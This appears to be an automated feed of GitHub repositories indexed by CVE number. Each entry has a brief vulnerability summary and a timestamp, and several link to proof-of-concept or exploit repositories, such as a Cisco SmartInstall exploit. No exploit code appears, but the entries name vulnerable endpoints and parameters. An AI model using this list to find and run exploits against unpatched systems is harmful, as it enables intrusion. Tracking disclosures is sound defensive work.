**HPSFViewer might allow Escalation of Privilege. This potential vulnerability was remediated on July 29th, 2022. Customers who opted for automatic updates should have already received the remediation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3990](https://github.com/Live-Hack-CVE/CVE-2022-3990) create time: 2023-02-01T11:23:38Z

**A potential Time-of-Check to Time-of-Use (TOCTOU) vulnerability has been identified in the BIOS for certain HP PC products which may allow arbitrary code execution, denial of service, and information disclosure. HP is releasing BIOS updates to mitigate the potential vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27538](https://github.com/Live-Hack-CVE/CVE-2022-27538) create time: 2023-02-01T11:23:35Z

**Potential vulnerabilities have been identified in the system BIOS of certain HP PC products, which might allow arbitrary code execution, escalation of privilege, denial of service, and information disclosure. HP is releasing BIOS updates to mitigate these potential vulnerabilities. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27537](https://github.com/Live-Hack-CVE/CVE-2022-27537) create time: 2023-02-01T11:23:30Z

**Potential security vulnerabilities have been identified in HP Support Assistant. These vulnerabilities include privilege escalation, compromise of integrity, allowed communication with untrusted clients, and unauthorized modification of files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23455](https://github.com/Live-Hack-CVE/CVE-2022-23455) create time: 2023-02-01T11:23:26Z

**Potential security vulnerabilities have been identified in HP Support Assistant. These vulnerabilities include privilege escalation, compromise of integrity, allowed communication with untrusted clients, and unauthorized modification of files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23454](https://github.com/Live-Hack-CVE/CVE-2022-23454) create time: 2023-02-01T11:23:22Z

**Potential security vulnerabilities have been identified in HP Support Assistant. These vulnerabilities include privilege escalation, compromise of integrity, allowed communication with untrusted clients, and unauthorized modification of files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23453](https://github.com/Live-Hack-CVE/CVE-2022-23453) create time: 2023-02-01T11:23:19Z

**Cross-site Scripting (XSS) - DOM in GitHub repository microweber/microweber prior to 1.3.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0608](https://github.com/Live-Hack-CVE/CVE-2023-0608) create time: 2023-02-01T11:24:24Z

**This CVE ID has been rejected or withdrawn by its CVE Numbering Authority. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0115](https://github.com/Live-Hack-CVE/CVE-2023-0115) create time: 2023-02-01T11:23:42Z

**Out-of-bounds Read vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.1.0 through 1.5.0. Users are advised to upgrade to Apache InLong's latest version or cherry-pick https://github.com/apache/inlong/pull/7214 https://github.com/apache/inlong/pull/7214 to solve it. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24977](https://github.com/Live-Hack-CVE/CVE-2023-24977) create time: 2023-02-01T11:22:58Z

**no description** : [CDACesec/CVE-2022-31902](https://github.com/CDACesec/CVE-2022-31902) create time: 2022-07-11T10:32:08Z

**A CWE-200: Information Exposure vulnerability exists that could cause the exposure of sensitive information stored on the memory of the controller when communicating over the Modbus TCP protocol. Affected Products: Modicon M340 CPU (part numbers BMXP34*) (Versions prior to V3.30), Modicon M580 CPU (part numbers BMEP* a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22786](https://github.com/Live-Hack-CVE/CVE-2021-22786) create time: 2023-02-01T07:02:45Z

**A sensitive information leak issue has been discovered in all versions of DAST API scanner from 1.6.50 prior to 2.0.102, exposing the Authorization header in the vulnerability report CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4206](https://github.com/Live-Hack-CVE/CVE-2022-4206) create time: 2023-02-01T07:03:06Z

**A CWE-798: Use of Hard-coded Credentials vulnerability exists that could cause local privilege escalation when local attacker connects to the database. Affected Products: APC Easy UPS Online Monitoring Software (Windows 7, 10, 11 & Windows Server 2016, 2019, 2022 - Versions prior to V2.5-GA), APC Easy UPS Online Monito CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42973](https://github.com/Live-Hack-CVE/CVE-2022-42973) create time: 2023-02-01T07:02:49Z

**A CWE-285: Improper Authorization vulnerability exists that could cause unauthorized access to certain software functions when an attacker gets access to localhost interface of the EcoStruxure Power Commission application. Affected Products: EcoStruxure Power Commission (Versions prior to V2.25) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4062](https://github.com/Live-Hack-CVE/CVE-2022-4062) create time: 2023-02-01T07:02:37Z

**A CWE-306: Missing Authentication for Critical Function The software does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources. Affected Products: APC Easy UPS Online Monitoring Software (Windows 7, 10, 11 & Windows Server 2016, 2019, 2022 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42970](https://github.com/Live-Hack-CVE/CVE-2022-42970) create time: 2023-02-01T07:02:33Z

**A CWE-190: Integer Overflow or Wraparound vulnerability exists that could cause heap-based buffer overflow, leading to denial of service and potentially remote code execution when an attacker sends multiple specially crafted messages. Affected Products: IGSS Data Server - IGSSdataServer.exe (Versions prior to V15.0.0.2 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2329](https://github.com/Live-Hack-CVE/CVE-2022-2329) create time: 2023-02-01T07:02:30Z

**A CWE-434: Unrestricted Upload of File with Dangerous Type vulnerability exists that could cause remote code execution when the attacker uploads a malicious JSP file. Affected Products: APC Easy UPS Online Monitoring Software (Windows 7, 10, 11 & Windows Server 2016, 2019, 2022 - Versions prior to V2.5-GA), APC Easy UP CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42971](https://github.com/Live-Hack-CVE/CVE-2022-42971) create time: 2023-02-01T07:02:25Z

**A CWE-732: Incorrect Permission Assignment for Critical Resource vulnerability exists that could cause local privilege escalation when a local attacker modifies the webroot directory. Affected Products: APC Easy UPS Online Monitoring Software (Windows 7, 10, 11 & Windows Server 2016, 2019, 2022 - Versions prior to V2.5 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42972](https://github.com/Live-Hack-CVE/CVE-2022-42972) create time: 2023-02-01T07:02:22Z

**A CWE-120: Buffer Copy without Checking Size of Input vulnerability exists that could cause a stack-based buffer overflow potentially leading to remote code execution when an attacker sends a specially crafted message. Affected Products: IGSS Data Server - IGSSdataServer.exe (Versions prior to V15.0.0.22073) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24324](https://github.com/Live-Hack-CVE/CVE-2022-24324) create time: 2023-02-01T07:02:18Z

**Dell PowerScale OneFS 9.0.0.x - 9.4.0.x, contains an Improper Handling of Insufficient Privileges vulnerability in NFS. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to information disclosure and remote execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45101](https://github.com/Live-Hack-CVE/CVE-2022-45101) create time: 2023-02-01T07:02:14Z

**Dell PowerScale OneFS 9.0.0.x-9.4.0.x contains an Incorrect User Management vulnerability. A low privileged network attacker could potentially exploit this vulnerability, leading to escalation of privileges, and information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45097](https://github.com/Live-Hack-CVE/CVE-2022-45097) create time: 2023-02-01T07:02:11Z

**Dell PowerScale OneFS, 8.2.0 through 9.3.0, contain an User Interface Security Issue. An unauthenticated remote user could unintentionally lead an administrator to enable this vulnerability, leading to disclosure of information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45096](https://github.com/Live-Hack-CVE/CVE-2022-45096) create time: 2023-02-01T07:02:07Z

**Dell PowerScale OneFS, 8.2.x-9.4.x, contain a command injection vulnerability. An authenticated user having access local shell and having the privilege to gather logs from the cluster could potentially exploit this vulnerability, leading to execute arbitrary commands, denial of service, information disclosure, and data CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45095](https://github.com/Live-Hack-CVE/CVE-2022-45095) create time: 2023-02-01T07:02:04Z

**Dell Command | Update, Dell Update, and Alienware Update versions prior to 4.7 contain a improper verification of cryptographic signature in get applicable driver component. A local malicious user could potentially exploit this vulnerability leading to malicious payload execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34459](https://github.com/Live-Hack-CVE/CVE-2022-34459) create time: 2023-02-01T07:02:00Z

**Dell Rugged Control Center, versions prior to 4.5, contain an Improper Input Validation in the Service EndPoint. A Local Low Privilege attacker could potentially exploit this vulnerability, leading to an Escalation of privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34443](https://github.com/Live-Hack-CVE/CVE-2022-34443) create time: 2023-02-01T07:01:56Z

**Dell Command | Update, Dell Update, and Alienware Update versions prior to 4.7 contain a Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in download operation component. A local malicious user could potentially exploit this vulnerability leading to the disclosure of confidential CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34458](https://github.com/Live-Hack-CVE/CVE-2022-34458) create time: 2023-02-01T07:01:53Z

**Versions of the package mt7688-wiscan before 0.8.3 are vulnerable to Command Injection due to improper input sanitization in the 'wiscan.scan' function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25916](https://github.com/Live-Hack-CVE/CVE-2022-25916) create time: 2023-02-01T07:01:49Z

**Dell BIOS contains a heap buffer overflow vulnerability. A local attacker with admin privileges could potentially exploit this vulnerability to perform an arbitrary write to SMRAM during SMM. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34400](https://github.com/Live-Hack-CVE/CVE-2022-34400) create time: 2023-02-01T07:01:46Z

**All versions of the package is-http2 are vulnerable to Command Injection due to missing input sanitization or other checks, and sandboxes being employed to the isH2 function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25906](https://github.com/Live-Hack-CVE/CVE-2022-25906) create time: 2023-02-01T07:01:42Z

**A file upload vulnerability in exists in Trend Micro Apex One server build 11110. Using a malformed Content-Length header in an HTTP PUT message sent to URL /officescan/console/html/cgi/fcgiOfcDDA.exe, an unauthenticated remote attacker can upload arbitrary files to the SampleSubmission directory (i.e., \PCCSRV\TEMP\Sa CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0587](https://github.com/Live-Hack-CVE/CVE-2023-0587) create time: 2023-02-01T07:03:10Z

**OrangeScrum version 2.0.11 allows an authenticated external attacker to delete arbitrary local files from the server. This is possible because the application uses an unsanitized attacker-controlled parameter to construct an internal path. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0454](https://github.com/Live-Hack-CVE/CVE-2023-0454) create time: 2023-02-01T07:03:03Z

**Due to insufficient length validation in the Open5GS GTP library versions prior to versions 2.4.13 and 2.5.7, when parsing extension headers in GPRS tunneling protocol (GPTv1-U) messages, a protocol payload with any extension header length set to zero causes an infinite loop. The affected process becomes immediately un CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23846](https://github.com/Live-Hack-CVE/CVE-2023-23846) create time: 2023-02-01T07:02:59Z

**VMware vRealize Operations (vROps) contains a CSRF bypass vulnerability. A malicious user could execute actions on the vROps platform on behalf of the authenticated victim user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-20856](https://github.com/Live-Hack-CVE/CVE-2023-20856) create time: 2023-02-01T07:02:56Z

**As part of our Security Development Lifecycle, a potential privilege escalation issue was identified internally. This could allow a malicious actor with sufficient permissions to modify environment variables and abuse an impacted plugin in order to escalate privileges. We have resolved the issue and also made several d CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0524](https://github.com/Live-Hack-CVE/CVE-2023-0524) create time: 2023-02-01T07:02:52Z

**Cross-site Scripting (XSS) - Stored in GitHub repository projectsend/projectsend prior to r1606. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0607](https://github.com/Live-Hack-CVE/CVE-2023-0607) create time: 2023-02-01T07:02:41Z

**Cisco SmartInstall Exploit [CVE-2018-0171]** : [AlrikRr/Cisco-Smart-Exploit](https://github.com/AlrikRr/Cisco-Smart-Exploit) create time: 2023-02-01T03:51:56Z

**no description** : [masahiro331/cve-2022-25927](https://github.com/masahiro331/cve-2022-25927) create time: 2023-02-01T04:16:47Z

**no description** : [Cedric1314/CVE-2022-47872](https://github.com/Cedric1314/CVE-2022-47872) create time: 2023-02-01T02:34:19Z

**stb stb_image.h 2.19, as used in catimg, Emscripten, and other products, has a heap-based buffer overflow in the stbi__out_gif_code function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-16981](https://github.com/Live-Hack-CVE/CVE-2018-16981) create time: 2023-02-01T01:25:21Z

**A stack buffer overflow in the compute_codewords function in stb_vorbis through 2019-03-04 allows an attacker to cause a denial of service or execute arbitrary code by opening a crafted Ogg Vorbis file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13221](https://github.com/Live-Hack-CVE/CVE-2019-13221) create time: 2023-02-01T01:25:43Z

**A reachable assertion in the lookup1_values function in stb_vorbis through 2019-03-04 allows an attacker to cause a denial of service by opening a crafted Ogg Vorbis file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13223](https://github.com/Live-Hack-CVE/CVE-2019-13223) create time: 2023-02-01T01:25:39Z

**An out-of-bounds read of a global buffer in the draw_line function in stb_vorbis through 2019-03-04 allows an attacker to cause a denial of service or disclose sensitive information by opening a crafted Ogg Vorbis file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13222](https://github.com/Live-Hack-CVE/CVE-2019-13222) create time: 2023-02-01T01:25:36Z

**A NULL pointer dereference in the get_window function in stb_vorbis through 2019-03-04 allows an attacker to cause a denial of service by opening a crafted Ogg Vorbis file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13219](https://github.com/Live-Hack-CVE/CVE-2019-13219) create time: 2023-02-01T01:25:32Z

**Division by zero in the predict_point function in stb_vorbis through 2019-03-04 allows an attacker to cause a denial of service by opening a crafted Ogg Vorbis file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13218](https://github.com/Live-Hack-CVE/CVE-2019-13218) create time: 2023-02-01T01:25:28Z

**Use of uninitialized stack variables in the start_decoder function in stb_vorbis through 2019-03-04 allows an attacker to cause a denial of service or disclose sensitive information by opening a crafted Ogg Vorbis file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13220](https://github.com/Live-Hack-CVE/CVE-2019-13220) create time: 2023-02-01T01:25:25Z

**A heap buffer overflow in the start_decoder function in stb_vorbis through 2019-03-04 allows an attacker to cause a denial of service or execute arbitrary code by opening a crafted Ogg Vorbis file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13217](https://github.com/Live-Hack-CVE/CVE-2019-13217) create time: 2023-02-01T01:25:18Z

**fig2dev 3.2.7b contains a global buffer overflow in the setfigfont function in genepic.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21532](https://github.com/Live-Hack-CVE/CVE-2020-21532) create time: 2023-02-01T01:26:00Z

**fig2dev 3.2.7b contains a global buffer overflow in the conv_pattern_index function in gencgm.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21531](https://github.com/Live-Hack-CVE/CVE-2020-21531) create time: 2023-02-01T01:25:57Z

**fig2dev 3.2.7b contains a stack buffer overflow in the bezier_spline function in genepic.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21529](https://github.com/Live-Hack-CVE/CVE-2020-21529) create time: 2023-02-01T01:25:53Z

**An issue was discovered in fig2dev before 3.2.8.. A NULL pointer dereference exists in the function compute_closed_spline() located in trans_spline.c. It allows an attacker to cause Denial of Service. The fixed version of fig2dev is 3.2.8. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32280](https://github.com/Live-Hack-CVE/CVE-2021-32280) create time: 2023-02-01T01:25:50Z

**An issue was discovered in stb stb_image.h 1.33 through 2.27. The HDR loader parsed truncated end-of-file RLE scanlines as an infinite sequence of zero-length runs. An attacker could potentially have caused denial of service in applications using stb_image by submitting crafted HDR files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42715](https://github.com/Live-Hack-CVE/CVE-2021-42715) create time: 2023-02-01T01:25:15Z

**Buffer overflow vulnerability in function stbi__extend_receive in stb_image.h in stb 2.26 via a crafted JPEG file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28021](https://github.com/Live-Hack-CVE/CVE-2021-28021) create time: 2023-02-01T01:25:11Z

**Netcad KEOS 1.0 is vulnerable to XML External Entity (XXE) resulting in SSRF with XXE (remote). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47873](https://github.com/Live-Hack-CVE/CVE-2022-47873) create time: 2023-02-01T01:25:46Z

**stb_image.h v2.27 was discovered to contain an integer overflow via the function stbi__jpeg_decode_block_prog_dc. This vulnerability allows attackers to cause a Denial of Service (DoS) via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28041](https://github.com/Live-Hack-CVE/CVE-2022-28041) create time: 2023-02-01T01:25:07Z

**stb_image.h v2.27 was discovered to contain an heap-based use-after-free via the function stbi__jpeg_huff_decode. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28042](https://github.com/Live-Hack-CVE/CVE-2022-28042) create time: 2023-02-01T01:25:04Z

**Easy Images v2.0 was discovered to contain an arbitrary file download vulnerability via the component /application/down.php. This vulnerability is exploited via a crafted GET request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48161](https://github.com/Live-Hack-CVE/CVE-2022-48161) create time: 2023-02-01T01:24:44Z

**Proof of concept for CVE-2022-44318** : [Halcy0nic/CVE-2022-44318](https://github.com/Halcy0nic/CVE-2022-44318) create time: 2023-02-01T01:00:33Z

**Proof of concept for (CVE-2022-43343)** : [Halcy0nic/CVE-2022-43343](https://github.com/Halcy0nic/CVE-2022-43343) create time: 2023-02-01T00:33:57Z

**Proof of concept for CVE-2022-44311** : [Halcy0nic/CVE-2022-44311](https://github.com/Halcy0nic/CVE-2022-44311) create time: 2023-01-31T23:53:39Z

**Forget Heart Message Box v1.1 was discovered to contain a SQL injection vulnerability via the name parameter at /cha.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24956](https://github.com/Live-Hack-CVE/CVE-2023-24956) create time: 2023-02-01T01:24:58Z

**Forget Heart Message Box v1.1 was discovered to contain a SQL injection vulnerability via the name parameter at /admin/loginpost.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24241](https://github.com/Live-Hack-CVE/CVE-2023-24241) create time: 2023-02-01T01:24:55Z

**Dompdf is an HTML to PDF converter. The URI validation on dompdf 2.0.1 can be bypassed on SVG parsing by passing `` tags with uppercase letters. This may lead to arbitrary object unserialize on PHP < 8, through the `phar` URL wrapper. An attacker can exploit the vulnerability to call arbitrary URL with arbitrary CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23924](https://github.com/Live-Hack-CVE/CVE-2023-23924) create time: 2023-02-01T01:24:52Z

**A stack buffer overflow exists in the ec_glob function of editorconfig-core-c before v0.12.6 which allowed an attacker to arbitrarily write to the stack and possibly allows remote code execution. editorconfig-core-c v0.12.6 resolved this vulnerability by bound checking all write operations over the p_pcre buffer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0341](https://github.com/Live-Hack-CVE/CVE-2023-0341) create time: 2023-02-01T01:24:48Z

**IBM Emptoris Sourcing 10.1.0 through 10.1.3, IBM Contract Management 10.1.0 through 10.1.3, and IBM Emptoris Spend Analysis 10.1.0 through 10.1.3 could allow an authenticated user to obtain sensitive information from error messages IBM X-Force ID: 161034. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4308](https://github.com/Live-Hack-CVE/CVE-2019-4308) create time: 2023-01-31T23:14:32Z

**Multiple binaries in IBM SDK, Java Technology Edition 7, 7R, and 8 on the AIX platform use insecure absolute RPATHs, which may facilitate code injection and privilege elevation by local users. IBM X-Force ID: 163984. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4473](https://github.com/Live-Hack-CVE/CVE-2019-4473) create time: 2023-01-31T23:14:29Z

**IBM Security Guardium Big Data Intelligence 4.0 (SonarG) uses an inadequate account lockout setting that could allow a remote attacker to brute force account credentials. IBM X-Force ID: 161036. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4310](https://github.com/Live-Hack-CVE/CVE-2019-4310) create time: 2023-01-31T23:14:25Z

**IBM Robotic Process Automation with Automation Anywhere 11 uses a high privileged PostgreSQL account for database access which could allow a local user to perform actions they should not have privileges to execute. IBM X-Force ID: 160764. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4298](https://github.com/Live-Hack-CVE/CVE-2019-4298) create time: 2023-01-31T23:14:22Z

**IBM Robotic Process Automation with Automation Anywhere 11 could allow a local user to obtain highly sensitive information from log files when debugging is enabled. IBM X-Force ID: 160765. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4299](https://github.com/Live-Hack-CVE/CVE-2019-4299) create time: 2023-01-31T23:14:18Z

**When using IBM Spectrum Protect Plus 10.1.0, 10.1.2, and 10.1.3 to protect Oracle or MongoDB databases, a redirected restore operation may result in an escalation of user privileges. IBM X-Force ID: 162165. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4383](https://github.com/Live-Hack-CVE/CVE-2019-4383) create time: 2023-01-31T23:14:08Z

**In FreeBSD 12.0-STABLE before r350619, 12.0-RELEASE before 12.0-RELEASE-p9, 11.3-STABLE before r350619, 11.3-RELEASE before 11.3-RELEASE-p2, and 11.2-RELEASE before 11.2-RELEASE-p13, the bhyve e1000 device emulation used a guest-provided value to determine the size of the on-stack buffer without validation when TCP seg CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5609](https://github.com/Live-Hack-CVE/CVE-2019-5609) create time: 2023-01-31T23:13:38Z

**In FreeBSD 12.0-STABLE before r350648, 12.0-RELEASE before 12.0-RELEASE-p9, 11.3-STABLE before r350650, 11.3-RELEASE before 11.3-RELEASE-p2, and 11.2-RELEASE before 11.2-RELEASE-p13, the ICMPv6 input path incorrectly handles cases where an MLDv2 listener query packet is internally fragmented across multiple mbufs. A re CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5608](https://github.com/Live-Hack-CVE/CVE-2019-5608) create time: 2023-01-31T23:13:34Z

**In FreeBSD 12.0-STABLE before r350637, 12.0-RELEASE before 12.0-RELEASE-p9, 11.3-STABLE before r350638, 11.3-RELEASE before 11.3-RELEASE-p2, and 11.2-RELEASE before 11.2-RELEASE-p13, the bsnmp library is not properly validating the submitted length from a type-length-value encoding. A remote user could cause an out-of- CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5610](https://github.com/Live-Hack-CVE/CVE-2019-5610) create time: 2023-01-31T23:13:31Z

**In FreeBSD 12.0-STABLE before r350828, 12.0-RELEASE before 12.0-RELEASE-p10, 11.3-STABLE before r350829, 11.3-RELEASE before 11.3-RELEASE-p3, and 11.2-RELEASE before 11.2-RELEASE-p14, a missing check in the function to arrange data in a chain of mbufs could cause data returned not to be contiguous. Extra checks in the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5611](https://github.com/Live-Hack-CVE/CVE-2019-5611) create time: 2023-01-31T23:13:27Z

**In FreeBSD 12.0-STABLE before r351264, 12.0-RELEASE before 12.0-RELEASE-p10, 11.3-STABLE before r351265, 11.3-RELEASE before 11.3-RELEASE-p3, and 11.2-RELEASE before 11.2-RELEASE-p14, the kernel driver for /dev/midistat implements a read handler that is not thread-safe. A multi-threaded program can exploit races in the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-5612](https://github.com/Live-Hack-CVE/CVE-2019-5612) create time: 2023-01-31T23:13:24Z

**An issue was discovered in the Harmis JE Messenger component 1.2.2 for Joomla!. It is possible to read information that should only be accessible by a different user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9921](https://github.com/Live-Hack-CVE/CVE-2019-9921) create time: 2023-01-31T23:13:20Z

**The affected Reason S20 Ethernet Switch is vulnerable to cross-site scripting (XSS), which may allow an attacker to trick application users into performing critical application actions that include, but are not limited to, adding and updating accounts. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16242](https://github.com/Live-Hack-CVE/CVE-2020-16242) create time: 2023-01-31T23:14:15Z

**urllib3 before 1.25.9 allows CRLF injection if the attacker controls the HTTP request method, as demonstrated by inserting CR and LF control characters in the first argument of putrequest(). NOTE: this is similar to CVE-2020-26116. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26137](https://github.com/Live-Hack-CVE/CVE-2020-26137) create time: 2023-01-31T23:14:11Z

**url.cpp in libproxy through 0.4.15 is prone to a buffer overflow when PAC is enabled, as demonstrated by a large PAC file that is delivered without a Content-length header. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26154](https://github.com/Live-Hack-CVE/CVE-2020-26154) create time: 2023-01-31T23:14:04Z

**Dell XPS 13 9370 BIOS versions prior to 1.13.1 contains an Improper Exception Handling vulnerability. A local attacker with physical access could exploit this vulnerability to prevent the system from booting until the exploited boot device is removed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-5387](https://github.com/Live-Hack-CVE/CVE-2020-5387) create time: 2023-01-31T23:14:01Z

**In kdeconnect-kde (aka KDE Connect) before 20.08.2, an attacker on the local network could send crafted packets that trigger use of large amounts of CPU, memory, or network connection slots, aka a Denial of Service attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26164](https://github.com/Live-Hack-CVE/CVE-2020-26164) create time: 2023-01-31T23:13:57Z

**An issue was discovered in SearchController in phpMyAdmin before 4.9.6 and 5.x before 5.0.3. A SQL injection vulnerability was discovered in how phpMyAdmin processes SQL statements in the search feature. An attacker could use this flaw to inject malicious SQL in to a query. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26935](https://github.com/Live-Hack-CVE/CVE-2020-26935) create time: 2023-01-31T23:13:53Z

**If an HTTP/2 client connecting to Apache Tomcat 10.0.0-M1 to 10.0.0-M7, 9.0.0.M1 to 9.0.37 or 8.5.0 to 8.5.57 exceeded the agreed maximum number of concurrent streams for a connection (in violation of the HTTP/2 protocol), it was possible that a subsequent request made on that connection could contain HTTP headers - in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13943](https://github.com/Live-Hack-CVE/CVE-2020-13943) create time: 2023-01-31T23:13:50Z

**In Python 3 through 3.9.0, the Lib/test/multibytecodec_support.py CJK codec tests call eval() on content retrieved via HTTP. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27619](https://github.com/Live-Hack-CVE/CVE-2020-27619) create time: 2023-01-31T23:13:45Z

**A Denial of Service condition in Motion-Project Motion 3.2 through 4.3.1 allows remote unauthenticated users to cause a webu.c segmentation fault and kill the main process via a crafted HTTP request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26566](https://github.com/Live-Hack-CVE/CVE-2020-26566) create time: 2023-01-31T23:13:42Z

**Proof of concept for CVE-2022-36752** : [Halcy0nic/CVE-2022-36752](https://github.com/Halcy0nic/CVE-2022-36752) create time: 2023-01-31T23:14:06Z

**Buffer overflow vulnerability in function json_parse_object in sheredom json.h before commit 0825301a07cbf51653882bf2b153cc81fdadf41 (November 14, 2022) allows attackers to code arbitrary code and gain escalated privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45494](https://github.com/Live-Hack-CVE/CVE-2022-45494) create time: 2023-01-31T23:13:16Z

**EQ v1.5.31 to v2.2.0 was discovered to contain a SQL injection vulnerability via the UserPwd parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45297](https://github.com/Live-Hack-CVE/CVE-2022-45297) create time: 2023-01-31T23:13:13Z

**Docker version 20.10.15, build fd82621 is vulnerable to Insecure Permissions. Unauthorized users outside the Docker container can access any files within the Docker container. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37708](https://github.com/Live-Hack-CVE/CVE-2022-37708) create time: 2023-01-31T23:13:09Z

**BTCPay Server 1.3.0 through 1.5.3 allows a remote attacker to obtain sensitive information when a public Point of Sale app is exposed. The sensitive information, found in the HTML source code, includes the xpub of the store. Also, if the store isn't using the internal lightning node, the credentials of a lightning node CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32984](https://github.com/Live-Hack-CVE/CVE-2022-32984) create time: 2023-01-31T23:13:05Z

**Proof of concept for CVE-2022-41220** : [Halcy0nic/CVE-2022-41220](https://github.com/Halcy0nic/CVE-2022-41220) create time: 2023-01-31T23:05:31Z

**Proof of concept for CVE-2022-34913** : [Halcy0nic/CVE-2022-34913](https://github.com/Halcy0nic/CVE-2022-34913) create time: 2023-01-31T22:37:29Z

**A vulnerability, which was classified as problematic, was found in SiteFusion Application Server up to 6.6.6. This affects an unknown part of the file getextension.php of the component Extension Handler. The manipulation leads to path traversal. Upgrading to version 6.6.7 is able to address this issue. The name of the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-15023](https://github.com/Live-Hack-CVE/CVE-2016-15023) create time: 2023-01-31T22:07:57Z

**An exploitable stack-based buffer overflow vulnerability exists in the retrieval of database fields in the video-core HTTP server of the Samsung SmartThings Hub STH-ETH-250 - Firmware version 0.20.17. The strcpy call overflows the destination buffer, which has a size of 2000 bytes. An attacker can send an arbitrarily l CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3914](https://github.com/Live-Hack-CVE/CVE-2018-3914) create time: 2023-01-31T22:07:39Z

